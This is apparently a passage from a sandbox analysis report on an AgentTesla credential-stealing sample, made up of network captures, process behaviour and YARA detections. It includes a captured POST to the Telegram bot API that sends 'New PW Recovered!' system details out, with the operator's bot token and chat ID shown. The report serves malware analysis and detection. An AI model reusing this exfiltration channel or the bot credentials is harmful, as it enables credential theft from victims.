                                                      May 4, 2022 14:37:14.498420954 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498447895 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498473883 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498501062 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.499952078 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.499979973 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.500051022 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.500159025 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.500176907 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.500258923 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.554722071 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.554894924 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:25.098345995 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.098407984 CEST4434974140.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.098511934 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.098990917 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.099016905 CEST4434974140.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.144711018 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.144762039 CEST4434974340.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.144856930 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.145052910 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.145071030 CEST4434974340.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.710009098 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710062027 CEST4434974840.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.710205078 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710541964 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710566998 CEST4434974840.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:27.166102886 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:27.166165113 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:27.535794020 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:27.649444103 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:28.206187963 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:28.253160000 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:29.409497023 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:29.550045013 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:31.909598112 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:31.952646971 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:36.847651005 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:36.910098076 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:46.457775116 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:46.579255104 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:58.174837112 CEST49743443192.168.2.440.126.31.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 4, 2022 14:38:04.750358105 CEST6075853192.168.2.48.8.8.8
                                                      May 4, 2022 14:38:04.768125057 CEST53607588.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 4, 2022 14:38:04.750358105 CEST192.168.2.48.8.8.80x9334Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 4, 2022 14:37:54.344527006 CEST8.8.8.8192.168.2.40x4f0bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                      May 4, 2022 14:38:04.768125057 CEST8.8.8.8192.168.2.40x9334No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • api.telegram.org

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.449768149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-04 12:38:05 UTC0OUTPOST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
                                                      Host: api.telegram.org
                                                      Content-Length: 754
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-04 12:38:05 UTC0INHTTP/1.1 100 Continue
                                                      2022-05-04 12:38:05 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 33 31 38 31 30 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 30 36 31 35 34 34 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da2ddf8401560cContent-Disposition: form-data; name="chat_id"1131810225-----------------------------8da2ddf8401560cContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/061544OSFull
                                                      2022-05-04 12:38:05 UTC1INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 04 May 2022 12:38:05 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 606
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":11954,"from":{"id":1698102386,"is_bot":true,"first_name":"hyacith","username":"ugochibot"},"chat":{"id":1131810225,"first_name":"uwe","last_name":"Karen","type":"private"},"date":1651667885,"document":{"file_name":"user-061544 2022-05-04 03-05-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIusmJyc62WHLhzqejVctcsRLOLg5xoAAI1AgACduCZRwoWHQEMSu5XJAQ","file_unique_id":"AgADNQIAAnbgmUc","file_size":184},"caption":"New PW Recovered!\n\nUser Name: user/061544\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:14:37:19
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                                                      Imagebase:0xee0000
                                                      File size:689664 bytes
                                                      MD5 hash:5D5F37A7CF3A9FF4277B3A9DC2C4B9D2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Target ID:9
                                                      Start time:14:37:44
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      Imagebase:0xa50000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      General

                                                      Target ID:14
                                                      Start time:14:38:06
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                                                      Imagebase:0x550000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 0%, Virustotal, Browse
                                                      • Detection: 0%, Metadefender, Browse
                                                      • Detection: 0%, ReversingLabs
                                                      Reputation:high

                                                      General

                                                      Target ID:15
                                                      Start time:14:38:07
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff647620000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:16
                                                      Start time:14:38:15
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                                                      Imagebase:0x600000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:17
                                                      Start time:14:38:16
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff647620000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      No disassembly